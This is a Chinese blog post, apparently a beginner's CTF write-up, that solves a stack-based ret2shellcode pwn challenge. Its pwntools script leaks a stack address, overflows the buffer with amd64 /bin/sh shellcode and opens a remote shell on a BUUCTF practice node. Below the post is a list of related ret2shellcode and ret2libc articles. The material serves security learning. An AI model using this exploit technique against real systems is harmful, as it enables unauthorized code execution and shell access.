(shellcode注入攻击)ret2shellcode-栈上的ret2shellcode

于 2024-08-14 11:41:39 发布
阅读量310 收藏 3
点赞数 5
文章标签: 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83500274/article/details/141186675
版权

        ret2shellcode的题,大致为bss段上的和栈上的shellcode

举一个例题

用64ida打开发现如下情况,他输出了v4的地址,然后shift+F12没有发现什么后面函数和bin/sh字样,所以我们可以考虑用栈上的ret2shellcode来写

思路:

生成64位的shellcode,接收v4的地址,利用ljust覆盖填充,返回v4的地址

脚本:

from pwn import *

context(os='linux', arch='amd64')
r = remote('node5.buuoj.cn',28468)
shellcode=asm(shellcraft.amd64.sh())
padding = 0x60 + 8
v4_addr = r.recvline()#这里接受的是第一个puts的
v4_addr = int(r.recvline()[33:-1],16)#这里接受的是printf里的,并且进行了切片操作,使得位v4地址并且转换为10进制

payload = shellcode.ljust(padding,b'a') + p64(v4_addr)#填充数据
r.sendline(payload)
r.interactive()

脚本并不是唯一的,本人也刚开始接触,如果有疑问或者更好的方法记得留言讨论

牢玖站起来
关注
ret2shellcode知识点及例题
weixin_44864859的博客
05-19 869
ret2shellcode 检查程序的基础信息后发现和ret2text不同的是其关闭了nx防护,这就代表IP寄存器可以指向堆,栈了。 运行程序可以看到只有一个输入,接下来用ida打开进行分析。 与ret2text一样可以很明显的看到在main函数中调用了gets函数。我们同样可以控制返回地址,但返回到什么地方呢? 查看内部函数可以看到,此时程序中并没有用到system函数,那应该怎么办呢? 这里需要注意有两个点 1 NX: NX disabled 2 strncpy(buf2, &a
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 869
CTF-wiki的注解:ret2shellcode
Ret2ShellCode详解
Sakura给爷pwn全场
10-24 412
StackOverFlow之Ret2ShellCode详解: https://www.freebuf.com/vuls/179724.html https://www.jianshu.com/p/7dad572adae9
ret2shellcode
weixin_56301399的博客
07-20 567
基本流程是先查看文件信息,然后ida反编译,再去寻找自己所要的变量,最后构建代码。
基本ROP之ret2shellcode
至臻求学,胸怀云月
01-12 1658
原理 控制程序执行shellcode代码 shellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。 一般来说,shellcode需要我们自己进行填充,这其实是一种典型的利用方法。 执行条件: 对应二进制在执行时,shellcode所在区域需要可执行的权限。 过程 下载地址 查看程序保护机制 毫无保护 IDA看下汇编指令 发现gets危险函数 同时还有...
pwn刷题num35----ret2shellcode
tbsqigongzi的博客
04-29 329
BUUCTF-PWN-ciscn_2019_n_5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 未开启NX保护-----堆栈可执行,可注入shellcode 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,先是让我们输入一个name,之后让我们输入一些信息,什么也看不出来 ida一下 注意两个函数 read(0, name, 0x64uLL);
从零开始做题:逆向 ret2shellcode orw
weixin_44626085的博客
01-28 803
下载orw时防病毒要关闭。
Performing a ret2libc Attack-InVoLuNTaRy
04-24
**ret2libc**(返回到libc或返回到C库)是一种攻击技术,它允许攻击者在无需注入shellcode的情况下控制目标系统中的易受攻击进程。这种攻击方式特别适用于那些具有非可执行堆栈的系统,这类系统的防御机制通常会阻止...
pwn小白入门04---ret2shellcode
weixin_45943522的博客
02-21 1968
原理 ret2shellcode,当程序当中没有system函数时,我们需要自己往栈上写入一段shellcode,然后控制eip使其指向shellcode的地址。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 在栈溢出的基础上,要想执行 shellcode,需要对应的程序在运行时,shellcode 所在的区域具有可执行权限。即必须关闭堆栈不可执行功能。 例题(来自ctfwiki): 首先checksec: 发现程序没有开启任何保护,并且存在可读可写
PWN ret2shellcode
prettyX的博客
11-22 1991
今天天气阴,来做一下ret2shellcode。 记录一下。 : ) 0X00 ret2shellcode原理 ret2shellcode,就是,return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcodeshellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。 ret2shellcode...
【PWN · ret2shellcode | jmp rsp | jmp rsi】[广东省大学生攻防大赛 2022]jmp_rsp
最新发布
Mr_Fmnwon的博客
03-05 852
ret2shellcode,一般是往某个wx属性的地方写上shellcode,再尝试进行控制流劫持,跳转到shellcode处。一、题目概述题目并不难,没有套多少壳子,一眼漏洞。关注寄存器残留的值利用rsp和栈可写可执行,能够做很多事情。
Rop-Ret2Shellcode-64位实例
fanghuapyk的博客
03-19 878
Rop-Ret2Shellcode-64位实例 前面写过了32位的shellcode,这次继续64位shellcode,当我们的64位程序中没有system函数,并且开启了NX保护时,这时我们需要用到64位的shellcode来执行execve(“/bin/sh”,null,null); 如何编写shellcode呢? ①想办法调用execve("/binsh" , null, null); ②借助栈来传入字符串/bin/sh ③系统调用execve rax = 0x3b(64bit) rdi = bin_
ShellCode注入
南宫封清的博客
05-03 1486
注意点: 1. 不能有全局变量 2. 不能使用常量字符串 ,可以使用这种形式 szTitle = {'a', 'b', 'c', 0}; 3. 不能使用系统调用,比如不能直接使用MessageBox,因为生成的汇编是 Call [0xxxxxx],这个0xxxxx是导入表的地址,注入的程序导入表地址不同而且导入表中不一定有这个函数,可以使用LoadLibrary配合GetProcAddres...
[PWN][进阶篇]ROP-Ret2Shellcode-64位实例
网络安全知识分享
03-24 4251
ROP-Ret2Shellcode-64位实例 /usr/include/x86_64-linux-gnu/asm/unisted_64.h 编写64位shellcode,思路和32位是一样的 (1)想办法调用execve("/bin/sh",null,null) (2)借助栈来传入字符串/bin/sh (3)系统调用execve rax = 0x3b(64bit) rdi = bin_sh_addr rsi = 0 rdx = 0 实例代码如下: setvbuf函数的作用是优化io流,在服务器上时,或
Linux下shellcode注入的方法,linux shellcode技术.pdf
weixin_39626089的博客
05-13 324
linux shellcode技术第9章 Linux shellcode技术中国科学技术大学曾凡平billzeng@ustc.edu.cnLinux shellcode技术• 缓冲区溢出攻击面临的3个问题:(1)返回地址在攻击串的位置;(2)返回地址的值;(3)编写shellcode 。• 编写shellcode要用到汇编语言。x86 的汇编语法常见的有AT&T 和Intel 。• Lin...
解析两道pwn题shellcode利用
weixin_44113469的博客
03-12 2070
两道题都是shellcode直接利用,简单记录解题的过程。 runit 逻辑不难,使用mmap()分配一块内存,然后通过read函数写入数据到这个内存块,接下来就直接执行我们输入的数据,所以可以直接构造shellcode注入到该内存块,完事。 exp ...
Linux下shellcode的编写
weixin_30387663的博客
04-30 759
Linux下shellcode的编写 来源https://xz.aliyun.com/t/2052 EdvisonV/2018-02-14 22:00:42/浏览数 6638技术文章技术文章 0x01 理解系统调用 shellcode是一组可注入的指令,可以在被攻击的程序中运行。由于shellcode要直接操作寄存器和函数,所以必须是十六进制的形式。那么为什么要写sh...
深入理解ret2libc攻击:无壳代码控制
ret2libc是一种针对栈溢出漏洞的利用方法,它让攻击者无需编写复杂的壳代码就能获取对目标程序的控制权。 文章首先介绍ret2libc的基本概念。在典型的栈溢出场景中,如果一个程序存在未经精心编码的函数,该函数对栈...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值